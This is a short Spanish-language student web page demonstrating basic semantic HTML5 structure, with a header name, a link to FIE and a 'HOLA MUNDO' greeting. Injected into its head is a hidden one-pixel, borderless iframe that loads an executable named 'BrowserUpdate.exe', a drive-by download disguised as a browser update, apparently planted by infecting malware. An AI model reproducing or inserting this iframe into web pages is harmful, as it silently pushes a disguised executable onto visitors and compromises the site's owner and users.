Abril_14.html



<!DOCTYPE html>

<html lang="es">

<!-- PAGINA DE FUENTES: http://www.fontsquirrel.com/   -->
<!-- RESPONSIVE DESIGN (diseño sensible a la pantalla) -->
<!-- MAQUETADO -->
<head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
	<title>Estructura B&aacute;sica Sem&aacute;ntica en HTML5 y CSS3</title>
	<meta charset="utf-8" />
	<meta description="DESCRIPCION DE LA PAGINA" content="Estructura B&aacute;sica Sem&aacute;ntica en HTML5 y CSS3 con responsive design" />
	<link rel="stylesheet" type="text/css" media="all" href="css/Estilo.css" />
</head>

<body background=Fondo.jpg>
	<header>
			<h1>J. Rafael Rodr&iacute;guez Ochoa</h1>
	</header>

	<section id="cuerpo">
		<section id="izq">
			<a href=http://www.fie.umich.mx/ target=Centro>FIE</a>
		</section>

		<section id="der">
				HOLA MUNDO<br>
		</section>
	</section>

	<footer>
			imagenes
	</footer>
</body>

</html>